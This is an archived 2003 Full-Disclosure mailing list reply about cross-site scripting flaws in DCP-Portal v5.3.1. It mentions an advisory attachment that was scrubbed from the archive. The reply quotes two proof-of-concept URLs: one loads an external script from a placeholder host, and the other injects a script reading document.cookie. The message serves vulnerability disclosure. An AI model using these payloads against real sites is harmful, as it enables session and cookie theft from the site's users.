| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20030319190125.5ea412b1.mcbethh@op.pl> From: mcbethh at op.pl (mcbethh@...pl) Subject: Re: Some XSS vulns On Wed, 19 Mar 2003 01:59:35 +0200 Ertan Kurt <ertank@...mpos.org> wrote: > DCP-Portal v5.3.1 > http://target/search.php?fields=content&q=<script%20src=http://othersite/code.js></script> > http://target/calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05 > Vendor Site: http://www.dcp-portal.org I've found many more vulnerabilities in dcp-portal... look at attached advisory. Regards Grzegorz Aksamit ---------------------------------------------------------- ( signature censored ) ---------------------------------[ grzegorz aksamit ]----- -------------- next part -------------- A non-text attachment was scrubbed... Name: dcp-advisory-06-02-2003.txt Type: application/octet-stream Size: 4540 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030319/8f53bed6/dcp-advisory-06-02-2003.obj
Powered by blists - more mailing lists